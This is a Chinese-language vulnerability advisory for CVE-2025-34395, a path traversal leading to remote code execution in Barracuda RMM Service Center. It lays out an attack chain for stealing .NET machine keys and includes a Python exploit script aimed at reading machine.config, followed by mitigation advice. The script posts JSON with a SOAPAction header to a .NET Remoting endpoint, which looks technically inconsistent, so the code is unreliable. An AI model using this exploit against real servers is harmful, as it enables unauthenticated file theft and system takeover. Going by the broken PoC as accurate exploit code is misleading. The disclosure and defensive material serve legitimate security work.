CVE-2025-34395 Barracuda RMM Service Center路径遍历漏洞可升级为RCE

漏洞信息

漏洞编号

CVE-2025-34395

漏洞类型

路径遍历/远程代码执行

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Barracuda Service Center (RMM解决方案)

漏洞概述

CVE-2025-34395是Barracuda公司RMM（远程监控和管理）解决方案中Service Center组件的一个高危安全漏洞。该漏洞存在于2025.1.1之前的所有版本中，由于.NET Remoting服务暴露且存在路径遍历问题，未经身份认证的远程攻击者可以调用特定方法读取服务器上的任意文件。更为严重的是，攻击者通过读取.NET机器密钥，可以将漏洞利用升级为完整的远程代码执行（RCE），从而完全控制受影响的系统。此漏洞无需任何用户交互，攻击者可从网络直接发起，对系统的机密性和完整性造成严重影响。建议受影响用户尽快升级到2025.1.1或更高版本以修复此安全问题。

技术细节

该漏洞源于Barracuda Service Center中实现的.NET Remoting服务设计缺陷。具体问题包括：1) .NET Remoting服务被不当暴露在网络上；2) 服务中存在一个可被未认证用户调用的方法，该方法存在路径遍历（Path Traversal）漏洞，允许攻击者通过构造特殊的文件路径请求来读取服务器上的任意文件；3) 攻击者利用路径遍历读取.NET machine.config配置文件获取加密密钥和机器密钥；4) 获得机器密钥后，攻击者可以构造特定的序列化 payload 来实现远程代码执行。整个攻击过程无需任何认证凭证，且可以通过网络直接发起，CVSS评分达到7.5分（高危）。漏洞的根因在于.NET Remoting服务的访问控制机制缺失以及对用户输入的文件路径缺乏充分的验证和过滤。

攻击链分析

STEP 1

步骤1

发现Barracuda RMM Service Center的.NET Remoting服务暴露在网络上

STEP 2

步骤2

识别可被未认证调用的ReadFile方法

STEP 3

步骤3

利用路径遍历漏洞构造恶意请求，读取.NET machine.config获取机器密钥

STEP 4

步骤4

使用获取的机器密钥构造序列化payload

STEP 5

步骤5

通过.NET Remoting服务反序列化触发远程代码执行

STEP 6

步骤6

获得服务器完全控制权限，执行任意系统命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-34395 Path Traversal PoC for Barracuda RMM Service Center
# Reference: https://www.vulncheck.com/advisories/barracuda-rmm-service-center-net-remoting-path-traversal-rce

import requests
import sys

def exploit_path_traversal(target_url, file_path):
    """
    Exploit path traversal to read arbitrary files from Barracuda RMM Service Center
    """
    # Construct the path traversal payload
    payload = {
        'method': 'ReadFile',
        'params': {
            'filePath': file_path
        }
    }
    
    headers = {
        'Content-Type': 'application/octet-stream',
        'SOAPAction': 'http://tempuri.org/IServiceCenter/ReadFile'
    }
    
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=30)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-34395.py <target_url> <file_to_read>")
        print("Example: python cve-2025-34395.py https://target:8080/ServiceCenter.rem C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    
    print(f"[*] Attempting to read: {file_path}")
    result = exploit_path_traversal(target, file_path)
    print(f"[+] Response:\n{result}")

if __name__ == "__main__":
    main()

影响范围

Barracuda Service Center (RMM) < 2025.1.1

防御指南

临时缓解措施

立即将Barracuda RMM升级到2025.1.1版本，该版本已修复路径遍历漏洞。在无法立即升级的情况下，可通过防火墙限制对Service Center端口的访问，只允许受信任的管理IP访问。同时建议监控日志中是否存在异常的路径遍历请求模式。